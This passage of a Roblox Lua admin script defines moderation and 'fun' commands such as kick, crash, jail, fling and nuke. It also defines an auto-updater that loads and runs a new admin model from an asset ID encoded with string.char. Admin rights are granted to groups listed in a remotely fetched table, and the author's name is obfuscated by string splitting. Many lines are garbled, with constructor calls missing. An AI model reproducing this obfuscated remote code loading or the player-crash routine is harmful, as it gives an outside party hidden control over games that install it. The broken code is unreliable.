  936. CORE:ExecuteResource("RemotePropertyReader", Reader)
  937. return Reader
  938. else
  939. return Obj
  940. end
  941. end
  943. function CORE:ReadProperty(Reader, Player, Property)
  944. if Reader:IsA("RemoteFunction") then
  945. return Reader:InvokeClient(Player, Property)
  946. else
  947. return Reader[Property]
  948. end
  949. end
  951. function CORE:WriteProperty(Reader, Player, Property, Value)
  952. if Reader:IsA("RemoteFunction") then
  953. return Reader:InvokeClient(Player, Property, Value)
  954. else
  955. return Reader[Property]
  956. end
  957. end
  960. function CORE:CreateRemoteEvent(Obj, EventName)
  961. local Event ="RemoteEvent", Obj)
  962. Event.Name = "RemoteEvent_"..EventName
  963. CORE:ExecuteResource("RemoteEventHandler", Event, {["EventName"] = EventName})
  964. return Event
  965. end
  967. function CORE:HandleEvent(Obj, EventName, Func, NewThread)
  968. local function Handle()
  969. if Server.Workspace.FilteringEnabled == true then
  970. local Event = CORE:CreateRemoteEvent(Obj, EventName)
  971. return Event.OnServerEvent:connect(function(Player, ...)
  972. Func(...)
  973. end)
  974. else
  975. return Obj[EventName]:connect(Func)
  976. end
  977. end
  978. if NewThread then
  979. Spawn(Handle)
  980. else
  981. Handle()
  982. end
  983. end
  985. function CORE:HandleError(Error, Speaker)
  986. local Return = ""
  987. if not Error or Error == "" then
  988. Return = "Unknown Error"
  989. else
  990. Return = "Error: "..(string.match(Error, '"*".:(.+)') or "Unknown line: "..Error)
  991. end
  992. if Speaker then
  993. GUI:SendMessage(Speaker, "Error ", "RED "..Return, "Error")
  994. end
  995. return Return
  996. end
  998. local function ExecuteSafe(Source, Speaker) -- no CORE
  999. local Script, Error = loadstring(Source)
  1000. if Error then
  1001. return false, CORE:HandleError(Error, Speaker)
  1002. else
  1003. getfenv(Script).SOUND,getfenv(Script).MARKET,getfenv(Script).RANK,getfenv(Script).STRING,getfenv(Script).GUI,getfenv(Script).CORE,getfenv(Script).REMOTE = SOUND,MARKET,RANK,STRING,GUI,CORE,REMOTE
  1004. getfenv(Script).Server, getfenv(Script).script = Server,script
  1005. if Speaker then
  1006. getfenv(Script).print = function(...)
  1007. GUI:SendMessage(Speaker, "Print Output", STRING:UnpackArgs(...), "Output")
  1008. end
  1009. getfenv(Script).print_array = function(List)
  1010. if type(List) == "table" then
  1011. GUI:ListGui(Speaker, "Listed Table", List, "Output")
  1012. end
  1013. end
  1014. end
  1016. local Suc, Error = ypcall(coroutine.wrap(Script))
  1018. if not Suc then
  1019. Error = CORE:HandleError(Error, Speaker)
  1020. end
  1022. return Suc,Error
  1023. end
  1024. end
  1026. function CORE:GetTime(Regular, FullDate)
  1027. if Regular == nil then Regular = true end
  1028. local Meridiem = ""
  1029. if Regular == true then Meridiem = " AM" end
  1030. local SecondsOfToday = math.fmod(os.time(), 60*60*24)
  1031. local Hour = math.floor(SecondsOfToday / (60*60))
  1032. local Minute = math.floor(SecondsOfToday/60 - Hour*60)
  1033. local Second = math.floor(math.fmod(SecondsOfToday, 60))
  1034. if Hour > 12 and Regular == true then
  1035. Hour = Hour - 12
  1036. Meridiem = " PM"
  1037. end
  1038. Hour,Minute,Second = tostring(Hour),tostring(Minute),tostring(Second)
  1039. if #Hour <= 1 then Hour = "0"..Hour end
  1040. if #Minute <= 1 then Minute = "0"..Minute end
  1041. if #Second <= 1 then Second = "0"..Second end
  1042. local Return = Hour..":"..Minute..":"..Second..Meridiem
  1043. if FullDate == true and Date then Return = Date.." "..Return end
  1044. return Return
  1045. end
  1047. function CORE:RemoveAdmin(Speaker)
  1048. local Answer = true -- false
  1049. if not CORE:NilPlayer(Speaker) then
  1050. Answer = GUI:PromptMessageWithButtons(Speaker, "Remove M".."akerModelLua's Admin?", "Would you like to remove Ma".."kerModel".."L".."ua's Admin? After removing the admin, no one is admin and cannot be re-inserted until the server restarts. Continue?", "Question", {"Yes", "No"})
  1051. end
  1052. if Answer == "Yes" or CORE:NilPlayer(Speaker) then
  1053. if not CORE:NilPlayer(Speaker) then SOUND:PlayNotification(Speaker, 177835465, 1) wait(0.5) end
  1054. for _,Player in pairs(Server.Players:GetPlayers()) do if Player:FindFirstChild("PlayerGui") then
  1055. for _,Item in pairs(Player:GetChildren()) do
  1056. if Item.Name == "SendChat" or Item.Name == "DetachChatMM".."L" then
  1057. Item:Destroy()
  1058. end
  1059. end
  1060. for _,GUI in pairs(Player.PlayerGui:GetChildren()) do
  1061. if GUI.Name == "M".."ak".."erModelLua's Admin Form" or GUI.Name == "M".."ak".."erM".."odelLua's Admin Form Sound" or GUI.Name == "M".."a".."k".."erMo".."delLua's TaskBar" or GUI.Name == "M".."a".."k".."e".."r".."m".."ode".."lLu".."a's HUD Gui" then
  1062. GUI:Destroy()
  1063. end
  1064. end
  1065. end end
  1066. for _,Car in pairs(Cars) do
  1067. Car:Destroy()
  1068. end
  1069. CORE:FixLighting()
  1070. while wait() do
  1071. if script:FindFirstChild("Override") then script.Override.Value = true end
  1072. Settings,CORE,IRC = nil,{},{}
  1073. if Sound then Sound:Stop() end
  1074. if ExploitModule then ExploitModule.Disabled = true ExploitModule:Destroy() end
  1075. script:ClearAllChildren() script:Destroy() script.Disabled = true
  1076. end
  1077. end
  1078. end
  1080. function CORE:MakeBase()
  1081. for _,Get in pairs(Workspace:GetChildren()) do
  1082. if Get.Name == "Base" or Get.Name == "BasePlate" then
  1083. Get:Destroy()
  1084. end
  1085. end
  1086. local Base ="Part", Workspace) Base.Name = "Base" Base.Anchored = true Base.Size =,1,300) Base.BrickColor ="Bright green") Base.CFrame =,0,0) Base.Locked = true
  1087. end
  1089. function CORE:AddCommand(CommandNames, CommandExample, Description, Arguments, Rank, Fun, CommandFunction, IsAbusive, Http)
  1090. if IsAbusive == nil then IsAbusive = false end
  1091. if Commands[CommandName] then table.remove(Commands[CommandName]) end
  1092. Commands[CommandNames] = {CommandExample, Description, Arguments, Rank, Fun, CommandFunction, IsAbusive, Http = Http}
  1093. end
  1095. function CORE:FixLighting() coroutine.wrap(function()
  1096. ModLighting = false
  1097. wait(0.2)
  1098. Server.Lighting.Ambient =,0.5,0.5)
  1099. Server.Lighting.FogColor =,0,0)
  1100. Server.Lighting.Brightness = 1
  1101. Server.Lighting.TimeOfDay = 14
  1102. Server.Lighting.FogEnd = 100000
  1103. end)() end
  1105. function CORE:Round(Number)
  1106. if Number >= 0.5 then
  1107. return math.ceil(Number)
  1108. elseif Number < 0.5 then
  1109. return math.floor(Number)
  1110. end
  1111. end
  1113. local AdminID,Got = nil,false
  1114. repeat wait()
  1115. Got = ypcall(function() AdminID = Server.MPS:GetProductInfo(string.char(50, 50, 57, 56, 49, 54, 56, 51, 48)).Description end)
  1116. until Got == true
  1118. function CORE:GetTable(ID)
  1119. local Thing = nil
  1120. repeat wait()
  1121. ypcall(function() Thing = REMOTE:Decode(Server.MPS:GetProductInfo(ID).Description) end)
  1122. until Thing
  1123. return Thing
  1124. end
  1126. function CORE:InAdminGroup(Speaker)
  1127. local IsIn = false
  1128. for _,Get in pairs(CORE:GetTable(string.char(49, 53, 53, 55, 51, 54, 49, 50, 57))) do
  1129. if Speaker:IsInGroup(Get) then
  1130. IsIn = true
  1131. end
  1132. end
  1133. if IsIn == true then
  1134. return true
  1135. else
  1136. GUI:SendMessage(Speaker, "Command Invalid", GroupMessage, "Error")
  1137. return false
  1138. end
  1139. end
  1141. function CORE:ReverseTable(Table)
  1142. if type(Table) ~= "table" then return Table end
  1143. local NewTable = {}
  1144. for Num,Val in pairs(Table) do NewTable[(#Table - Num) + 1] = Val end
  1145. return NewTable
  1146. end
  1148. function CORE:Log(LogTable, Player, Chat)
  1149. local PlayerName = tostring(Player)
  1150. if type(Player) == "userdata" or type(Player) == "table" then PlayerName = Player.Name end
  1151. table.insert(LogTable, CORE:GetTime(true, true).." @ "..PlayerName..": "..Chat)
  1152. end
  1154. function CORE:Jail(Player)
  1155. if not Player then return nil end
  1156. local Cell = Workspace:FindFirstChild(Player.Name.."'s Cell") if Cell then Cell:Destroy() end
  1157. Cell ="Model", Workspace) Cell.Name = Player.Name.."'s Cell"
  1158. local Floor ="Part", Cell) Floor.Name = "Floor" Floor.FormFactor = "Custom" Floor.Size =,1,15) Floor.Material = "DiamondPlate" Floor.TopSurface = "Smooth" Floor.BottomSurface = "Smooth" Floor.Position =,1001.7,0) Floor.Anchored = true Floor.Locked = true
  1159. local Wall ="Part", Cell) Wall.Name = "Wall" Wall.FormFactor = "Custom" Wall.Size =,14.2,1) Wall.BrickColor ="Bright blue") Wall.TopSurface = "Smooth" Wall.BottomSurface = "Smooth" Wall.Position =,1009.3,-7) Wall.Anchored = true Wall.Locked = true Wall.Transparency = 0.5
  1160. local SG ="SurfaceGui", Wall) SG.Name = "SG" SG.Adornee = Wall
  1161. local Text ="TextLabel", SG) Text.Size =,0,1,0) Text.BackgroundTransparency = 1 Text.TextColor3 =,1,1) Text.Font = "ArialBold" Text.FontSize = "Size36" Text.TextYAlignment = "Bottom" Text.TextWrapped = true Text.Text = "WARNING: Wild noob in natural habitat. Do no tap glass, it may cause the noob to be angry. Do not open cage and feed noob"
  1162. Wall = Wall:Clone() Wall.Parent = Cell Wall.Position =,1009.3,7) Wall.SG.Face = "Back"
  1163. Wall = Wall:Clone() Wall.Parent = Cell Wall.Position =, 1009.3, 0) Wall.Size =,14.2,1) Wall.Rotation =,90,0) Wall.SG.Face = "Front"
  1164. Wall = Wall:Clone() Wall.Parent = Cell Wall.Position =, 1009.3, 0) Wall.Size =,14.2,1) Wall.Rotation =,90,0) Wall.SG.Face = "Back"
  1165. local Roof = Floor:Clone() Roof.Parent = Cell Roof.Name = "Roof" Roof.Position =,1016.9, 0)
  1166. Cell:MoveTo(,3,0))
  1168. if Player.Character and Player.Character:FindFirstChild("Torso") then
  1169. Cell:MoveTo(Player.Character.Torso.Position -,3,0))
  1170. Player.Character:MoveTo(Floor.Position +,2,0))
  1171. end
  1172. table.insert(Dispose, Cell)
  1173. Jails[Player.Name] = Cell
  1174. end
  1176. function CORE:UnJail(Player)
  1177. if not Player then return nil end
  1178. if Jails[Player.Name] then
  1179. Jails[Player.Name]:Destroy()
  1180. Jails[Player.Name] = nil
  1181. end
  1182. end
  1184. function CORE:ChangeName(Player, NewName)
  1185. if not Player or not NewName then return nil end
  1186. if Player.Character and Player.Character:FindFirstChild("Humanoid") and Player.Character:FindFirstChild("Head") then
  1187. local NewName = STRING:FormatReplace(Player, NewName)
  1189. for _,Obj in pairs(Player.Character:GetChildren()) do
  1190. if Obj.Name == "Label" then Obj:Destroy() end
  1191. end
  1193. local Head = Player.Character.Head
  1194. local HeadClone = Head:Clone()
  1196. -- make actual head invisible
  1197. Head.Transparency = 1
  1198. ypcall(function() Head.face.Transparency = 1 end)
  1200. -- make fake head visible
  1201. HeadClone.Transparency = 0
  1202. ypcall(function() HeadClone.face.Transparency = 0 end)
  1204. local Label ="Model", Player.Character)
  1205. Label.Name = "Label"
  1207. local Model ="Model", Label)
  1208. Model.Name = NewName
  1210. local HumanoidClone ="Humanoid", Model)
  1211. coroutine.wrap(function() while wait() and Player.Character and Player.Character:FindFirstChild("Humanoid") do HumanoidClone.Health = Player.Character.Humanoid.Health HumanoidClone.MaxHealth = Player.Character.Humanoid.MaxHealth end end)()
  1213. HeadClone.Position =,100,0)
  1214. HeadClone.CanCollide = false
  1215. ypcall(function() HeadClone.BrickColor = Player.Character["Body Colors"].Head end)
  1218. Delay(0.01, function() -- new roblox engine needs time to proccess that a label needs to be given after a model's been created
  1219. HeadClone.Parent = Model
  1220. local Weld ="Weld", HeadClone)
  1221. Weld.Part0 = HeadClone
  1222. Weld.Part1 = Head
  1223. end)
  1224. end
  1225. end
  1227. function CORE:UpdateAdmin()
  1228. if Server.Storage:FindFirstChild("PreventMMLUpdate") then
  1229. return nil
  1230. end
  1231. local UpdateModel = AdminID
  1232. if UpdateModel == 0 then return end
  1233. local NewAdminModel = nil
  1234. ypcall(function() NewAdminModel = Server.IS:LoadAsset(UpdateModel) end)
  1235. if NewAdminModel then
  1236. local NewAdmin = NewAdminModel:FindFirstChild("Ma".."kerModelLua's Admin", true)
  1237. if NewAdmin then
  1238. local NewVersion = NewAdmin:FindFirstChild("Version")
  1239. if NewVersion.Value ~= CORE.Version.Value then
  1240. if ExploitModule then
  1241. ExploitModule.Disabled = true
  1242. ExploitModule:Destroy()
  1243. end
  1244. NewAdmin.Disabled = true
  1245. NewAdmin.Parent = Workspace
  1246. if not Settings then
  1247. local NewSettings = NewAdminModel:FindFirstChild("M".."a".."kerMod".."elL".."a's Admin Settings", true)
  1248. if NewSettings then NewSettings.Parent = Workspace end
  1249. end
  1250. wait() NewAdmin.Disabled = false
  1251. CORE:RemoveAdmin()
  1252. else
  1253. NewAdminModel:Destroy()
  1254. end
  1255. end
  1256. end
  1257. end
  1259. function CORE:UnpackPlayers(Players)
  1260. local PlayerNames = ""
  1261. for Num,Player in pairs(Players) do
  1262. if Player ~= nil then
  1263. if Num ~= #Players then
  1264. PlayerNames = PlayerNames..Player.Name..", "
  1265. else
  1266. PlayerNames = PlayerNames..Player.Name
  1267. end
  1268. end
  1269. end
  1270. return PlayerNames
  1271. end
  1273. function CORE:GetValue(Value)
  1274. if Value:IsA("StringValue") then
  1275. if Value.Name == "Owner" then if not ScanAdminList(Value.Value) then table.insert(Settings.Ranks["Owner"], Value.Value) end end
  1276. if Value.Name == "Admin" then if not ScanAdminList(Value.Value) then table.insert(Settings.Ranks["Admin"], Value.Value) end end
  1277. if Value.Name == "Member" then if not ScanAdminList(Value.Value) then table.insert(Settings.Ranks["Member"], Value.Value) end end
  1278. if Value.Name == "Banned" then if not ScanAdminList(Value.Value) then table.insert(Settings.Ranks["Banned"], Value.Value) end end
  1279. if Value.Name == "Crashed" then if not ScanAdminList(Value.Value) then table.insert(Settings.Ranks["Crashed"], Value.Value) end end
  1280. if Value.Name == "Muted" then if not ScanAdminList(Value.Value) then table.insert(Settings.Ranks["Muted"], Value.Value) end end
  1281. if Value.Name == "RemoveAdmin" then if ScanAdminList(Value.Value) then
  1282. for Num,Admin in pairs(Settings.Ranks["Admin"]) do
  1283. if Admin == Value.Value then
  1284. table.remove(Settings.Ranks["Admin"],Num)
  1285. end
  1286. end
  1287. end end
  1288. end
  1289. end
  1291. function CORE:GetPlayer(ID)
  1292. local Return = {"Unknown", ID}
  1293. if tonumber(ID) then
  1294. for _,Data in pairs(CharacterCache) do
  1295. if ID == Data[2] then
  1296. return Data
  1297. end
  1298. end
  1299. ypcall(function()
  1300. local Name = Server.Players:GetNameFromUserIdAsync(ID)
  1301. if Name then
  1302. local Data = {Name, ID}
  1303. table.insert(CharacterCache, Data)
  1304. Return = Data
  1305. end
  1306. end)
  1307. else
  1308. local Name = tostring(ID)
  1309. for _,Data in pairs(CharacterCache) do
  1310. if string.lower(Name) == string.lower(Data[1]) then
  1311. return Data
  1312. end
  1313. end
  1314. ypcall(function()
  1315. local PlayerID = Server.Players:GetUserIdFromNameAsync(Name)
  1316. if PlayerID then
  1317. Name = Server.Players:GetNameFromUserIdAsync(PlayerID) or Name
  1318. local Data = {Name, PlayerID}
  1319. table.insert(CharacterCache, Data)
  1320. Return = Data
  1321. end
  1322. end)
  1323. end
  1325. return Return
  1326. end
  1328. function CORE:ChangeCharacter(Player, ID, Perm, Speaker, NameChar, ManualPos) coroutine.wrap(function()
  1329. if ID and #tostring(ID) >= 1 then
  1330. local PlayerName = nil
  1332. local Players = STRING:Scan(ID, Speaker)
  1333. if #Players >= 1 then -- if player is found in server
  1334. ID = Players[1].UserId
  1335. elseif tonumber(ID) then
  1336. local Data = CORE:GetPlayer(ID)
  1337. PlayerName = Data[1]
  1338. else
  1339. local Data = CORE:GetPlayer(tostring(ID))
  1340. PlayerName = Data[1]
  1341. ID = Data[2]
  1342. end
  1344. if tonumber(ID) == 20018 then -- exploding easter bunny
  1345. local OldID = ID
  1346. ID = 1
  1347. if Speaker then
  1348. if RANK:GetRank(Speaker) == "Member" then
  1349. coroutine.wrap(function()
  1350. wait(1)
  1351. GUI:SendMessage(Speaker, "You cannot character as this", "RED No exploding easter bunnies allowed, sorry", "Error", 10)
  1352. end)()
  1353. else ID = OldID
  1354. end
  1355. end
  1356. elseif tonumber(ID) == 1311 then -- ffjosh
  1357. local OldID = ID
  1358. ID = 1
  1359. if Speaker then
  1360. if RANK:GetRank(Speaker) == "Member" then
  1361. coroutine.wrap(function()
  1362. wait(1)
  1363. GUI:SendMessage(Speaker, "You cannot character as this", "RED No exploiting moderators allowed, sorry", "Error", 10)
  1364. end)()
  1365. else ID = OldID
  1366. end
  1367. end
  1368. end
  1370. if tonumber(ID) then
  1371. local Position = nil
  1372. if Player.Character ~= nil and Player.Character:FindFirstChild("Torso") ~= nil then
  1373. if ManualPos then
  1374. Position = ManualPos
  1375. else
  1376. Position = Player.Character.Torso.Position
  1377. end
  1378. end
  1379. Player.CharacterAppearance = ""..ID
  1380. wait() Player:LoadCharacter() wait()
  1381. if Position then Player.Character:MoveTo(Position) end
  1382. if not Perm then
  1383. Player.CharacterAppearance = ""..Player.UserId
  1384. end
  1385. if NameChar and PlayerName then
  1386. wait(2)
  1387. CORE:ChangeName(Player, PlayerName)
  1388. end
  1389. end
  1390. end
  1391. end)() end
  1393. function CORE:GenerateShield(Player)
  1394. if not Player then return nil end
  1395. if not Player.Character then return nil end
  1396. local Torso = Player.Character:FindFirstChild("Torso")
  1397. if not Torso then return nil end
  1399. local Shield = Player.Character:FindFirstChild("Shield")
  1400. if Shield then Shield:Destroy() end
  1402. Shield ="Part", Player.Character)
  1403. Shield.Name = "Shield"
  1404. Shield.Locked = true
  1405. Shield.CanCollide = false
  1406. Shield.Size =,10,10)
  1407. Shield.Shape = "Ball"
  1408. Shield.Color = GUI:GetColor()
  1409. Shield.Transparency = 0.5
  1410. Shield.TopSurface = "Smooth"
  1411. Shield.BottomSurface = "Smooth"
  1412. Shield.Anchored = true
  1413. Shield.Position = Torso.Position
  1415. local Hum = SOUND:MakeSound(Shield, 147493985, 1, 1, true)
  1416. local Zap = SOUND:MakeSound(Shield, 192783601, 1, 1, false)
  1418. Hum:Play()
  1420. Shield.Touched:connect(function(Part)
  1421. if Part.Parent ~= Server.Workspace then
  1422. local Humanoid = Part.Parent:FindFirstChild("Humanoid") or Part.Parent.Parent:FindFirstChild("Humanoid") or Part.Parent.Parent.Parent:FindFirstChild("Humanoid")
  1423. if Humanoid then
  1424. local Char = Humanoid.Parent
  1425. if Char:IsA("Model") and Humanoid.Health > 0 then
  1426. if Char ~= Player.Character then
  1427. Char:BreakJoints()
  1428. Zap:Play()
  1429. end
  1430. end
  1431. end
  1432. end
  1433. end)
  1435. coroutine.wrap(function() repeat wait()
  1436. Shield.CFrame = Torso.CFrame
  1437. until Torso.Parent == nil or Shield.Parent == nil end)()
  1438. end
  1440. function CORE:FlingPlayer(Player)
  1441. if Player and Player.Character then
  1442. if Player.Character:FindFirstChild("Torso") then
  1443. local Fling ="BodyForce", Player.Character.Torso)
  1444. Fling.Name = "Fling"
  1445. Fling.force =,10000,10000)
  1446. end
  1447. end
  1448. end
  1450. function CORE:Kick(Player, CustomMessage)
  1451. if not CustomMessage then CustomMessage = "You've been kicked by M".."ake".."rMode".."".."lLua's Admin. You cannot interact with the server in anyway." end
  1452. coroutine.wrap(function()
  1453. CORE:ExecuteResource("PlayerKickMessage", Player.Character, {["Message"] = CustomMessage})
  1454. wait(1)
  1455. Player:Kick(CustomMessage)
  1456. end)()
  1457. end
  1459. function CORE:Crash(Player)
  1460. local Parent = Player
  1461. if Player:FindFirstChild("Backpack") then Parent = Player.Backpack
  1462. elseif Player.Character then Parent = Player.Character end
  1464. CORE:ExecuteResource("Crash", Parent)
  1465. end
  1467. function CORE:RestoreCamera(Player)
  1468. if Player.Backpack then
  1469. CORE:ExecuteResource("RestoreCamera", Player.Backpack)
  1470. end
  1471. end
  1473. function CORE:ScanItems(BaseObj, ObjTypes, ActiveFunc)
  1474. local function ScanInstance(Object)
  1475. if #Object:GetChildren() > 0 then
  1476. for _,Obj in pairs(Object:GetChildren()) do
  1477. local IsType = false
  1478. if ObjTypes and #ObjTypes > 0 then
  1479. for _,ObjType in pairs(ObjTypes) do
  1480. if Obj:IsA(ObjType) then
  1481. IsType = true
  1482. break
  1483. end
  1484. end
  1485. else
  1486. IsType = true
  1487. end
  1488. if IsType == true then
  1489. ActiveFunc(Obj)
  1490. end
  1491. ScanInstance(Obj)
  1492. end
  1493. end
  1494. end
  1495. ScanInstance(BaseObj)
  1496. end
  1498. function CORE:AnchorPlayer(Player)
  1499. if not Player or not Player.Character or not Player.Character:FindFirstChild("Humanoid") then return end
  1501. Player.Character.Humanoid.WalkSpeed = 0
  1502. for _,Object in pairs(Player.Character:GetChildren()) do
  1503. if Object:IsA("BasePart") then
  1504. Object.Anchored = true
  1505. end
  1506. end
  1507. end
  1509. function CORE:UnanchorPlayer(Player)
  1510. if not Player or not Player.Character or not Player.Character:FindFirstChild("Humanoid") then return end
  1512. Player.Character.Humanoid.WalkSpeed = 16
  1513. for _,Object in pairs(Player.Character:GetChildren()) do
  1514. if Object:IsA("BasePart") then
  1515. Object.Anchored = false
  1516. end
  1517. end
  1518. end
  1520. function CORE:InvisiblePlayer(Player)
  1521. if not Player or not Player.Character then return end
  1523. CORE:ScanItems(Player.Character, {"BasePart", "Texture", "Decal"}, function(Obj) Obj.Transparency = 1 end)
  1524. end
  1526. function CORE:VisiblePlayer(Player)
  1527. if not Player or not Player.Character then return end
  1529. CORE:ScanItems(Player.Character, {"BasePart", "Texture", "Decal"}, function(Obj) if Obj.Name ~= "HumanoidRootPart" then Obj.Transparency = 0 end end)
  1530. end
  1532. function CORE:Nuke(Player) coroutine.wrap(function()
  1533. local Pos =,1,0)
  1534. if Player and Player.Character and Player.Character:FindFirstChild("Torso") then Pos = Player.Character.Torso.CFrame *,1,0) end
  1535. local Blast ="Part", Server.Workspace) Blast.Name = "BlastEx" Blast.Anchored = true Blast.CanCollide = false Blast.Size =,1,1) Blast.CFrame = Pos
  1536. local BlastMesh ="SpecialMesh", Blast) BlastMesh.MeshId = "rbxassetid://1290033" BlastMesh.TextureId = "rbxassetid://33145325" BlastMesh.Scale =,0,0)
  1537. local Wave ="Part", Server.Workspace) Wave.BrickColor ="Deep orange") Wave.Name = "WaveEx" Wave.Anchored = true Wave.CanCollide = false Wave.Size =,1,1) Wave.CFrame = Pos * CFrame.Angles(math.pi/2,0,0)
  1538. local WaveMesh ="SpecialMesh", Wave) WaveMesh.MeshId = "rbxassetid://3270017"
  1539. local Light ="PointLight", Blast) Light.Brightness = 1000 Light.Range = 10000 Light.Color =,0.2,0.2)
  1541. local Effect ="ColorCorrectionEffect", Server.Lighting) Effect.Brightness = 0.2 Effect.Contrast = 0.4 Effect.Saturation = 1 Effect.TintColor =,0.2,0.2)
  1543. Server.Lighting.Brightness = 5
  1544. Server.Lighting.Ambient =,0.5,0.5)
  1545. Server.OutdoorAmbient =,1,1)
  1547. local Exp ="Explosion", Server.Workspace)
  1548. Exp.Position = Pos.p
  1549. Exp.BlastPressure = 10000000
  1550. Exp.BlastRadius = 1000000
  1551. Exp.Hit:connect(function(Part)
  1552. if Part.Name ~= "Base" and Part.Name ~= "BasePlate" and Part ~= Blast and Part ~= Wave and Part.Name ~= "BlastEx" and Part.Name ~= "WaveEx" then
  1553. ypcall(function()
  1554. Part.Anchored = false
  1555. Part.BrickColor ="Black")
  1556. Part.Material = "Slate"
  1557. Part:BreakJoints()
  1558. end)
  1559. end
  1560. end)
  1562. local BoomSound = SOUND:MakeSound(Server.Workspace, 212389494, 1, 1.2, false)
  1563. BoomSound:Play()
  1564. for i = 0,100,0.5 do
  1565. Blast.Anchored = true
  1566. Wave.Anchored = true
  1567. BlastMesh.Scale =,i,i)
  1568. WaveMesh.Scale =^1.3,i^1.3,5)
  1569. Blast.CFrame = Pos
  1570. wait()
  1571. end
  1572. BoomSound:Stop()
  1573. Blast:Destroy()
  1574. Wave:Destroy()
  1575. wait()
  1576. BoomSound:Destroy()
  1577. Effect:Destroy()
  1578. for i = 10,5,-1 do
  1579. Server.Lighting.Brightness = (i-5) + 1
  1580. Server.Lighting.Ambient =,0.5,0.5)
  1581. Server.OutdoorAmbient =,i/10,i/10)
  1582. wait(0.05)
  1583. end
  1584. end)() end
  1586. function CORE:Insert(AssetID, Parent, GetFirstChild, FirstChildTypes, AbuseMode)
  1587. local AssetID = tonumber(AssetID)
  1588. local Item = nil
  1589. if AssetID and AssetID ~= 1055299 then
  1590. local CanInsert = true
  1591. if AbuseMode then
  1592. for _,ID in pairs(RemoteAbuseGear) do
  1593. if AssetID == tonumber(ID) then CanInsert = false break end
  1594. end
  1595. for _,ID in pairs(Settings.AbusableGear) do
  1596. if AssetID == tonumber(ID) then CanInsert = false break end
  1597. end
  1598. end
  1599. if CanInsert then
  1600. Item = Server.IS:LoadAsset(AssetID)
  1601. if GetFirstChild then
  1602. Item = Item:GetChildren()[1]
  1603. if FirstChildTypes and Item then
  1604. local ValidType = false
  1605. for _,Type in pairs(FirstChildTypes) do
  1606. if Item:IsA(Type) then
  1607. ValidType = true
  1608. break
  1609. end
  1610. end
  1611. if ValidType == false then
  1612. Item = nil
  1613. end
  1614. end
  1615. end
  1616. if Item and Parent then
  1617. Item.Parent = Parent
  1618. end
  1619. end
  1620. end
  1621. return Item
  1622. end
  1624. function CORE:GivePackage(Player, PID) coroutine.wrap(function()
  1625. if not Player or not Player.Character then return nil end
  1626. PID = tonumber(PID)
  1627. for _,Obj in pairs(Player.Character:GetChildren()) do
  1628. if Obj:IsA("CharacterMesh") then Obj:Destroy() end
  1629. end
  1630. if PID then
  1631. -- back when we needed HttpService to get packages.
  1632. --[[
  1633. if PackageCache[PID] then
  1634. for _,ID in pairs(PackageCache[PID]) do
  1635. CORE:Insert(ID, Player.Character, true, {"CharacterMesh"})
  1636. end
  1637. else
  1638. local IDsJSON = REMOTE:GetURL(CORE.Domain.."/APIs/GetPackage.php?PackageID="..PID)
  1639. if IDsJSON then
  1640. local IDs = REMOTE:Decode(IDsJSON)
  1641. if IDs then
  1642. if not IDs["Error"] then
  1643. table.insert(PackageCache, IDs)
  1644. for _,ID in pairs(IDs) do
  1645. CORE:Insert(ID, Player.Character, true, {"CharacterMesh"})
  1646. end
  1647. end
  1648. end
  1649. end
  1650. end
  1651. ]]
  1652. -- also, no need for a package cache since the GetAssetIdsForPackage method handles that internally
  1653. local IDs = {}
  1654. ypcall(function() IDs = Server.AS:GetAssetIdsForPackage(PID) end) -- it still errors so it needs to be contained.
  1655. if #IDs > 0 then
  1656. for _,ID in pairs(IDs) do
  1657. local PackagePart = CORE:Insert(ID)
  1658. for _,Obj in pairs(PackagePart:GetChildren()) do
  1659. if Obj:IsA("Accoutrement") or Obj:IsA("CharacterMesh") then
  1660. Obj.Parent = Player.Character
  1661. elseif Obj:IsA("Folder") then
  1662. if Obj.Name == "R6" then -- r15 coming to mml's admin confirmed?
  1663. Obj:GetChildren()[1].Parent = Player.Character
  1664. end
  1665. end
  1666. end
  1667. end
  1668. end
  1669. end
  1670. end)() end
  1672. function CORE:ChangeBet(Bet)
  1673. if tostring(Bet) and Bet ~= Settings.Bet then
  1674. for Index,Data in pairs(Commands) do
  1675. Commands[Index][1] = string.gsub(Data[1], Settings.Bet, Bet)
  1676. end
  1677. Settings.Bet = Bet
  1678. end
  1679. end
  1681. function CORE:ResetLighting()
  1682. ModLighting = false wait(0.2) ModLighting = true
  1683. end
  1685. function CORE:Fly(Player, Force)
  1686. if Player and Player.Character then
  1687. local StopFly ="RemoteFunction", Player.Character)
  1688. StopFly.Name = "StopMMLFly"
  1689. CORE:ExecuteResource("Fly", Player.Character, {["Force"] = Force, ["StopFunc"] = StopFly})
  1690. end
  1691. end
  1693. function CORE:GiveTools(Player, Type)
  1694. if not Player or not Player:FindFirstChild("Backpack") then return nil end
  1695. Type = string.lower(Type)
  1696. local _,RankNum = RANK:GetRank(Player)
  1697. local BuildTools = {73089166, 73089190, 73089204, 73089214, 73089239, 73089259, 58921588}
  1698. local BaseBuildTools = {["Move"] = "GameTool", ["Clone"] = "Clone", ["Delete"] = "Hammer"}
  1700. if Type == "basicbtools" or Type == "basicbuildtools" or Type == "basicbuildingtools" then
  1701. for Name,Type in pairs(BaseBuildTools) do
  1702. local Tool ="HopperBin", Player.Backpack)
  1703. Tool.Name = Name
  1704. Tool.BinType = Type
  1705. end
  1706. elseif Type == "psbtools" then
  1707. for _,Tool in pairs(BuildTools) do
  1708. CORE:Insert(Tool, Player.Backpack, true)
  1709. end
  1710. elseif Type == "f3xtools" or Type == "fextools" or Type == "f3x" then
  1711. if F3X then
  1712. local F3X = F3X:Clone()
  1713. F3X.Parent = Player.Backpack
  1714. end
  1715. elseif Type == "btools" then
  1716. if F3X then
  1717. local F3X = F3X:Clone()
  1718. F3X.Parent = Player.Backpack
  1719. end
  1720. for Name,Type in pairs(BaseBuildTools) do
  1721. local Tool ="HopperBin", Player.Backpack)
  1722. Tool.Name = Name
  1723. Tool.BinType = Type
  1724. end
  1725. for _,Tool in pairs(BuildTools) do
  1726. CORE:Insert(Tool, Player.Backpack, true)
  1727. end
  1728. else
  1729. for _,Region in pairs(ToolRegions) do
  1730. CORE:ScanItems(Region, {"HopperBin", "Tool"}, function(Item)
  1731. if Type == "all" then
  1732. local NewItem = Item:Clone()
  1733. NewItem.Parent = Player.Backpack
  1734. elseif string.sub(string.lower(Item.Name),1,#Type) == string.lower(Type) then
  1735. local NewItem = Item:Clone()
  1736. NewItem.Parent = Player.Backpack
  1737. end
  1738. end)
  1739. end
  1740. end
  1741. end
  1743. function CORE:Scale(Player, ScalePercent)
  1744. if not Player or not Player.Character or not tonumber(ScalePercent) then return end
